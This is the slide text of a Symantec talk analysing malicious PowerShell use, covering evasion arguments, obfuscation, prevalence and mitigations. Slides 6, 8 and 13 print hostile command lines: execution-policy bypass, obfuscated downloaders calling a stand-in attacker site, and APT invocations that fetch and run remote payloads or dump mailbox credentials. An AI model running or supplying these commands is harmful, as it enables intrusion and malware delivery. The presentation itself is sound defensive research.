Malicious PowerShell scripts are on the rise, as attackers are using the framework’s flexibility to download their payloads, traverse through a compromised network, and carry out reconnaissance. Symantec analyzed PowerShell malware samples to find out how much of a danger they posed. Further reading: PowerShell threats surge: 95.4 percent of analyzed scripts were malicious (https://www.symantec.com/connect/blogs/powershell-threats-surge-954-percent-analyzed-scripts-were-malicious) The increased use of PowerShell in attacks (https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/increased-use-of-powershell-in-attacks-16-en.pdf)

1. The Rise of PowerShell Threats
Candid Wueest
Presenter’s Title Here

2. PowerShell… in a nutshell
• PowerShell is a scripting language and command-line shell based on .NET
• Access to features such as Component Object Model (COM) & WMI
• Very powerful - features many cmdlets (command-lets)
• Installed by default on most Windows systems
• Default command shell from Windows 10 build 14971 onwards
• PowerShell scripts (.ps1) do not execute when double clicked
2
Copyright © 2017 Symantec Corporation

3. 10 Reasons Why Attackers Love PowerShell
1. Installed by default on all new Windows computers
2. Can execute directly from memory (stealthy)
3. Generates few traces by default (forensic/stealthy)
4. Has remote access capabilities by default with encrypted traffic
5. As a script, it is easy to obfuscate & difficult to detect
6. Defenders often overlook it when hardening their systems
7. It can bypass application-whitelisting tools depending on the configuration
8. Many gateway sandboxes do not handle script-based malware well
9. It has a growing community with readily available scripts
10. Many system administrators use and trust the framework (hiding in plain sight)
3
Copyright © 2017 Symantec Corporation

4. Common Malware Use Cases for PowerShell
4
Copyright © 2017 Symantec Corporation
PowerShell script used to
download payload to disk
or memory.
Often used in email
attachments such as WSF
or document macros.
DOWNLOADER
PowerShell script used as
persistent load point on
Windows.
Often stored completely in
registry (file-less) e.g.
Kotver or within WMI
LOAD POINT
PowerShell script remoting
to execute on remote
computer (Invoke-
Command)
Download and execute
Mimikatz, etc. in order to
steal credentials
LATERAL MOVEMENT

5. Example: Trojan.Poweliks
5
Copyright © 2017 Symantec Corporation
• File-less load point
• Multiple stages in registry
• Decrypted in memory
• Can be protected by a local encryption
key e.g. MAC address

6. PowerShell Execution Policy
Script execution is restricted by Windows, but can easily be overcome by the attacker.
For example on the command line with:
Copyright © 2017 Symantec Corporation
6
• Restricted
• AllSigned
• RemoteSigned
• Unrestricted
• Bypass
EXECUTION POLICY OPTIONS
• MachinePolicy
• UserPolicy
• Process
• CurrentUser
• LocalMachine
POLICY SCOPE OPTIONS
ExecutionPolicy bypass
command <a single command>

7. Script Execution Arguments
Copyright © 2017 Symantec Corporation
7
Command Line Args Description
Occurrence In
All Samples
Argument Shortcut Distribution
-NoProfile ignore the profile file 33.77% NoProfile (87%) / NoP (13%)
-WindowStyle Hidden hide the command window 23.76% WindowStyle (64%) / Window (18%) / Wind (<1%) / Win (<1%) / w (18%)
-ExecutionPolicy
Bypass ignore the execution policy 23.43% ExecutionPolicy (84%) / Exec (2%) / ex (8%) / ep (5%)
-Command run a single command 22.45% Command (100%)
-NoLogo, don’t displaying the banner 18.98% NoLogo (89%) / NoL (11%)
-InputFormat Set the format for data input 16.59% Inputformat
-EncodedCommand execute base64-encoded command 6.58% EncodedCommand (9%) / Enc (91%)
-Noninteractive starts in non-interactive mode. 3.82% NonInteractive (7%) / nonI (93%)
-File Load script from file 2.61% File (100%)

8. Obfuscation
• As with any scripting language, obfuscation is easy
• 20+ different obfuscation tricks available, can be used iteratively
• Tools like «invoke-obfuscation» makes it simple
Copyright © 2017 Symantec Corporation
8
(New-Object Net.WebClient).DownloadString("http://XXXX”)
Example script downloader
$webcl=New-Object Net.Webclient; $webcl.DownloadString($url)
Object replacement with variables
(&(GCM New-Ob*)net.webclient).downloadstring($url)
Command substitution
(New-Object Net.WebClient).Downloadstring(("http://{2}{1}"-f 'no','.TLD',’myAttackerSite’))
String manipulation

9. Obfuscation In The Wild
• Only 8% of the 111 observed PowerShell threats used obfuscation
• Targeted attack groups rarely bother with obfuscation
– Too much obfuscation can make the script appear more suspicious
• Extended script logging can reverse most of the obfuscation
Copyright © 2017 Symantec Corporation
9

10. Prevalence
• 95.4% of the PowerShell scripts submitted to Blue Coat MAA were malicious
Copyright © 2017 Symantec Corporation
10
1. 9.4% W97M.Downloader
2. 4.5% Trojan.Kotver
3. 4.0% JS.Downloader
TOP 3 THREATS THAT USE POWERSHELL
Volume of PowerShell
samples from customer
in our sandbox in 2016

11. PowerShell In Attacks
• PowerShell is gaining ground with attackers…
• And community support is rising fast
Copyright © 2017 Symantec Corporation
11
• PowerSploit
• PowerShell Empire
• NiShang
• PS>Attack
• Mimikatz
PEN TESTING FRAMEWORKS AVAILABLE
• Ransomware
• Downloader
• Back door
• ClickFraud
• Banking Trojan
COMMON MALWARE TYPES OBSERVED

12. WE EXPECT TARGETED ATTACK GROUPS TO CONTINUE TO FAVOR SIMPLE POWERSHELL
SCRIPTS AS PART OF THEIR ATTACK TOOL CHAIN IN THE FUTURE.
Targeted Attacks Using PowerShell
Most targeted attack groups use PowerShell scripts, as part of “living off the land” tactic
• Often used as downloader over HTTPS
• Information gathering (e.g. Mimikatz)
– Some still use system tools for data gathering, maybe to avoid
behavior based detection mechanisms
• Not yet seen any APT groups use a full PowerShell framework from end-to-end
– unlikely to happen
Copyright © 2017 Symantec Corporation
12

13. Example Usage By Targeted Attack Groups
Attack Group Script Invocations
Pupa/DeepPanda
powershell.exe -w hidden -nologo -nointeractive -nop -ep bypass -c "IEX ((new-object
net.webclient).downloadstring([REMOVED]))"
Pupa/DeepPanda powershell.exe -Win hidden -Enc [REMOVED]
Pupa/DeepPanda powershell -noprofile -windowstyle hidden -noninteractive -encodedcommand [REMOVED]
SeaDuke powershell -executionpolicy bypass -File diag3.ps1
SeaDuke
powershell -windowstyle hidden -ep bypass -f Dump.ps1 -Domain [REMOVED] -User
[REMOVED] -Password [REMOVED] –Mailbox
CozyDuke powershell.exe -WindowStyle hidden -encodedCommand [REMOVED]
Odinaff powershell.exe -NoP -NonI -W Hidden -Enc [REMOVED]
Buckeye
powershell.exe -w 1 cls (New-Object
Net.WebClient).DownloadFile("""http://[REMOVED]/images/rec.exe""","""$env:tmprec.exe
""");Iex %tmp%rec.exe
Copyright © 2017 Symantec Corporation
13

14. Things To Keep In Mind
• PowerShell scripts can be executed without powershell.exe, e.g. with .NET binary
• Most attacks require the attacker to be able to execute code first
– PowerShell is not an exploit
– Common exploits and social engineering tricks still apply
• 55% of the malicious PowerShell scripts where executed from the command line
– Often from a dropped batch or VBS file
• PowerShell can be used for defense as well as offense
Copyright © 2017 Symantec Corporation
14

15. Mitigation
• Upgrade to PowerShell 5+ where possible (to enable logging)
• Enabled extended logging/module logging and process/analyze logs
• Check for PowerShell use on your systems (location, time, user, file name, etc.)
• Evaluate PowerShell constrained language mode/restricted run space
• Evaluate system hardening, file whitelisting or app locker
Copyright © 2017 Symantec Corporation
15
PREVENT Block the incursion or infection, and prevent any damage from occurring
CONTAIN Limit the spread of an attack in the event of a intrusion
RESPOND Have an incident response process ready, learn from the attack, and improve defenses
APPLY COMMON BEST PRACTICES FOR EMAIL AND ENDPOINT SECURITY

16. 16
Copyright © 2017 Symantec Corporation

17. Advanced Antivirus Engine
• Symantec uses an array of detection engines including an advanced signature-based antivirus engine with heuristics, just-in-time (JIT) memory-scanning, and machine-
learning engines. This allows the detection of directly in-memory executed scripts.
SONAR Behavior Engine
• SONAR is Symantec’s real-time behavior-based protection that blocks potentially malicious applications from running on the computer. It detects malware without requiring
any specific detection signatures. SONAR uses heuristics, reputation data, and behavioral policies to detect emerging and unknown threats.
• SONAR can detect PowerShell script behaviors often used in post-infection lateral movement and block them.
Email Protection
• Email-filtering services such as Symantec Email Security.cloud can block malicious emails before they reach users.
• Symantec Messaging Gateway’s Disarm Technology can also protect computers from this threat by removing malicious content from
attached documents before they even reach the user.
Blue Coat Malware Analysis sandbox
• Sandboxes such as Blue Coat Malware Analysis have the capability to analyze and block malicious scripts including PowerShell scripts.
The technology can overcome multiple layers of obfuscation to detect deeply hidden suspicious behavior.
System Hardening
• Symantec’s system hardening solution, Symantec Data Center Security, can secure physical and virtual servers, and monitor the compliance posture of server systems for on-
premise, public, and private cloud data centers. By defining allowed behavior, Symantec Data Center Security can limit the use of PowerShell and any of its actions.
Symantec: Robust Protection Against PowerShell Threats
Copyright © 2017 Symantec Corporation
17

18. Conclusion
Copyright © 2017 Symantec Corporation
18
• PowerShell is very powerful and is here to stay
• PowerShell is popular for downloading & lateral movement
• Attackers currently do not use much obfuscation
• In-memory execution leaves only a few forensic traces
• Logging can generate a lot of data to process
• But if full logging is enabled, then activity is very difficult to hide

19. Further reading
• BLOG: PowerShell threats surge: 95.4 percent of analyzed scripts were malicious
• WHITEPAPER: The increased use of PowerShell in attacks
Copyright © 2016 Symantec Corporation
19

20. Thank you!
Symantec Corporation (NASDAQ: SYMC), the world’s leading cyber security company, helps businesses, governments and people secure their most important data wherever it lives. Organizations across the world look to Symantec for strategic, integrated solutions to defend against sophisticated attacks across endpoints, cloud and infrastructure.
Likewise, a global community of more than 50 million people and families rely on Symantec’s Norton suite of products for protection at home and across all of their devices. Symantec operates one of the world’s largest civilian cyber intelligence networks, allowing it to see and protect against the most advanced threats. For additional information, please
visit www.symantec.com or connect with us on Facebook, Twitter, and LinkedIn.
Copyright © 2016 Symantec Corporation. All rights reserved. Symantec and the Symantec logo are trademarks or registered trademarks of Symantec Corporation or its affiliates in the United States and other countries. Other names may be trademarks of their respective owners.
Candid Wueest
Presenter’s email
Presenter’s phone